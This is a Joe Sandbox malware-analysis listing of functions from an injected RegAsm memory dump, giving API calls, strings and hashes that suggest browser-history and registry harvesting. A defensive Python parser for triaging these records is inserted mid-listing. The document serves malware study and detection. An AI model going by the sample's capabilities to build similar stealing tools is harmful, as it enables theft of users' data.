                                                          • API String ID: 404372293-1284684873
                                                          • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                          • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                          • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                          • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                          APIs
                                                          • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                          • GetLastError.KERNEL32 ref: 0041855C
                                                          • Sleep.KERNEL32(00000064), ref: 00418571
                                                          • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                          • GetLastError.KERNEL32 ref: 0041858E
                                                          • Sleep.KERNEL32(00000064), ref: 004185A3
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: AttributesErrorFileLastSleep$??3@
                                                          • String ID:
                                                          • API String ID: 1040972850-0
                                                          • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                          • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                          • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                          • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                          APIs
                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                          • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                          • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                          • wcscpy.MSVCRT ref: 0040A0D9
                                                          • wcscat.MSVCRT ref: 0040A0E6
                                                          • wcscat.MSVCRT ref: 0040A0F5
                                                          • wcscpy.MSVCRT ref: 0040A107
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                          • String ID:
                                                          • API String ID: 1331804452-0
                                                          • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                          • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                          • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                          • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                          APIs
                                                            • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                          • String ID: advapi32.dll
                                                          • API String ID: 2012295524-4050573280
                                                          • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                          • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                          • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                          • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                          APIs
                                                          Strings
                                                          • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                          • <?xml version="1.0" ?>, xrefs: 0041007C
                                                          • <%s>, xrefs: 004100A6
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$_snwprintf
                                                          • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                          • API String ID: 3473751417-2880344631
                                                          • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                          • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                          • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                          • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: wcscat$_snwprintfmemset
                                                          • String ID: %2.2X
                                                          • API String ID: 2521778956-791839006
                                                          • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                          • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                          • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                          • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _snwprintfwcscpy
                                                          • String ID: dialog_%d$general$menu_%d$strings
                                                          • API String ID: 999028693-502967061
                                                          • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                          • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                          • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                          • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                          APIs
                                                          • memset.MSVCRT ref: 004116FF
                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                            • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                            • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                            • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                            • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                          • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                          • API String ID: 2618321458-3614832568
                                                          • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                          • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                          • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                          • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                          APIs
                                                          • memset.MSVCRT ref: 004185FC
                                                          • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??3@AttributesFilememset
                                                          • String ID:
                                                          • API String ID: 776155459-0
                                                          • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                          • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                          • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                          • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                          APIs
                                                          • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                          • malloc.MSVCRT ref: 00417524
                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                                                          • String ID:
                                                          • API String ID: 2308052813-0
                                                          • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                          • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                          • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                          • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                          APIs
                                                          • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                          • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: PathTemp$??3@
                                                          • String ID: %s\etilqs_$etilqs_
                                                          • API String ID: 1589464350-1420421710
                                                          • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                          • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                          • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                          • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastMessage_snwprintf
                                                          • String ID: Error$Error %d: %s
                                                          • API String ID: 313946961-1552265934
                                                          • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                          • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                          • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                          • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: foreign key constraint failed$new$oid$old
                                                          • API String ID: 0-1953309616
                                                          • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                          • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                          • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                          • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                          APIs
                                                          Strings
                                                          • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                          • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                          • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcpy
                                                          • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                          • API String ID: 3510742995-272990098
                                                          • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                          • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                          • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                          • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                          APIs
                                                            • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                            • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                            • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                            • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                                                          • memset.MSVCRT ref: 0040C439
                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                          • _wcsupr.MSVCRT ref: 0040C481
                                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                          • memset.MSVCRT ref: 0040C4D0
                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??3@$EnumValuememset$Open_wcsuprmemcpywcslen
                                                          • String ID:
                                                          • API String ID: 3312893244-0
                                                          • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                          • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                          • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                          • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcpymemset
                                                          • String ID: gj
                                                          • API String ID: 1297977491-4203073231
                                                          • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                          • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                          • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                          • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
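As an added example, not part of the Joe Sandbox report or of the Remcos sample, the following Python parser turns the per-function records in this listing into structured data: for each record it collects the direct and "Part of subcall function" API references, the string xrefs and the ID/hash fields, then applies a few assumed triage rules so that records such as the GetProcAddress/LoadLibraryW function labelled advapi32.dll above and the GetFileAttributes/GetLastError/Sleep function are surfaced automatically. The rule labels are assumptions, and the sample text embedded in the code is a trimmed, constructed copy of two records from this listing.

```python
"""Parse the per-function records of a Joe Sandbox IDA-plugin listing
(the 'APIs' / 'Strings' / 'Memory Dump Source' / 'Similarity' blocks) and
flag API combinations worth a closer look during triage.

Added example, not part of the Joe Sandbox report.  The triage rules and
their labels are assumptions chosen for illustration."""
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: a trimmed copy of two records from the listing.
SAMPLE = """\
APIs
  • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
• GetProcAddress.KERNEL32(?,00000000), ref: 00404398
• GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
Strings
Memory Dump Source
• Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
• String ID: advapi32.dll
• API String ID: 2012295524-4050573280
• Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
APIs
• GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
• GetLastError.KERNEL32 ref: 0041855C
• Sleep.KERNEL32(00000064), ref: 00418571
Memory Dump Source
• API ID: AttributesErrorFileLastSleep$??3@
• String ID:
• API String ID: 1040972850-0
• Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
"""


@dataclass
class ApiCall:
    """One API reference as printed; `subcall` holds the callee address when
    the line reads 'Part of subcall function XXXXXXXX: ...'."""
    name: str
    module: str
    ref: str
    args: Optional[str]
    subcall: Optional[str]


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)   # (text, xref) pairs
    fields: dict = field(default_factory=dict)    # "API ID", "String ID", ...

    def api_names(self):
        """Names of every API reached directly or through a listed subcall."""
        return {a.name for a in self.apis}


API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[^\s(.]+)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$")
XREF_RE = re.compile(r"^\s*•\s*(?P<text>.*), xrefs: (?P<ref>[0-9A-F]{8})\s*$")
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*?)\s*$")


def parse_records(text):
    """Split the listing into FunctionRecords; 'Instruction Fuzzy Hash' is
    the last field the plugin prints per function, so it closes a record."""
    records, cur = [], FunctionRecord()
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            cur.apis.append(ApiCall(m["name"], m["mod"], m["ref"], m["args"], m["sub"]))
            continue
        m = XREF_RE.match(line)
        if m:
            cur.strings.append((m["text"], m["ref"]))
            continue
        m = FIELD_RE.match(line)
        if m:
            cur.fields[m["key"]] = m["val"]
            if m["key"] == "Instruction Fuzzy Hash":
                records.append(cur)
                cur = FunctionRecord()
        # Bare section headers ("APIs", "Strings", "Similarity", ...) carry no data.
    return records


# Assumed triage rules: (label, APIs that must all be present,
# APIs of which at least one must be present; empty set = no constraint).
RULES = [
    ("dynamic import resolution", {"GetProcAddress"}, {"LoadLibraryW", "LoadLibraryA"}),
    ("retry-on-error file probe", {"GetLastError", "Sleep"},
     {"GetFileAttributesW", "GetFileAttributesA"}),
    ("registry value enumeration", {"RegEnumValueW"}, set()),
]


def triage_flags(rec):
    names = rec.api_names()
    return [label for label, all_of, any_of in RULES
            if all_of <= names and (not any_of or names & any_of)]


def api_histogram(records, direct_only=True):
    """Count API names across records; with direct_only, subcall lines are
    ignored so a shared helper's imports are not credited to every caller."""
    return Counter(a.name for r in records for a in r.apis
                   if not (direct_only and a.subcall))


if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(rec.fields.get("API String ID"), repr(rec.fields.get("String ID")),
              triage_flags(rec))
```

The subcall lines are kept as separate ApiCall entries rather than merged into the caller, so `api_histogram` can count what a function imports itself while `triage_flags` still sees APIs reached through a helper; running the module prints one line per record with its API String ID, its String ID and the rules it triggers.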
                                                          APIs
                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                                                            • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                          • API ID: ??3@
                                                          • String ID:
                                                          APIs
                                                          • AreFileApisANSI.KERNEL32 ref: 00417497
                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                          • malloc.MSVCRT ref: 004174BD
                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                                                          • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                                                          • String ID:
                                                          APIs
                                                          • GetParent.USER32(?), ref: 0040D453
                                                          • GetWindowRect.USER32(?,?), ref: 0040D460
                                                          • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                          • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                          • API ID: Window$Rect$ClientParentPoints
                                                          • String ID:
                                                          APIs
                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                          • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                          • memset.MSVCRT ref: 004450CD
                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                            • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                            • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                                                            • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                                                            • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                                                          • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                          • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                          • String ID:
                                                          APIs
                                                          • wcscpy.MSVCRT ref: 0044475F
                                                          • wcscat.MSVCRT ref: 0044476E
                                                          • wcscat.MSVCRT ref: 0044477F
                                                          • wcscat.MSVCRT ref: 0044478E
                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                            • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                            • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                                            • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                          Strings
                                                          • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                          • String ID: \StringFileInfo\
                                                          APIs
                                                          • API ID: ??3@
                                                          • String ID:
                                                          APIs
                                                          Strings
                                                          • API ID: memcpy$??3@
                                                          • String ID: g4@
                                                          APIs
                                                          Strings
                                                          • API ID: _memicmpwcslen
                                                          • String ID: @@@@$History
                                                          APIs
                                                          • memset.MSVCRT ref: 004100FB
                                                          • memset.MSVCRT ref: 00410112
                                                            • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                            • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                          • _snwprintf.MSVCRT ref: 00410141
                                                          Strings
                                                          • API ID: memset$_snwprintf_wcslwrwcscpy
                                                          • String ID: </%s>
                                                          APIs
                                                          • memset.MSVCRT ref: 0040D58D
                                                          • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                          • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                          Strings
                                                          • API ID: ChildEnumTextWindowWindowsmemset
                                                          • String ID: caption
                                                          APIs
                                                            • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
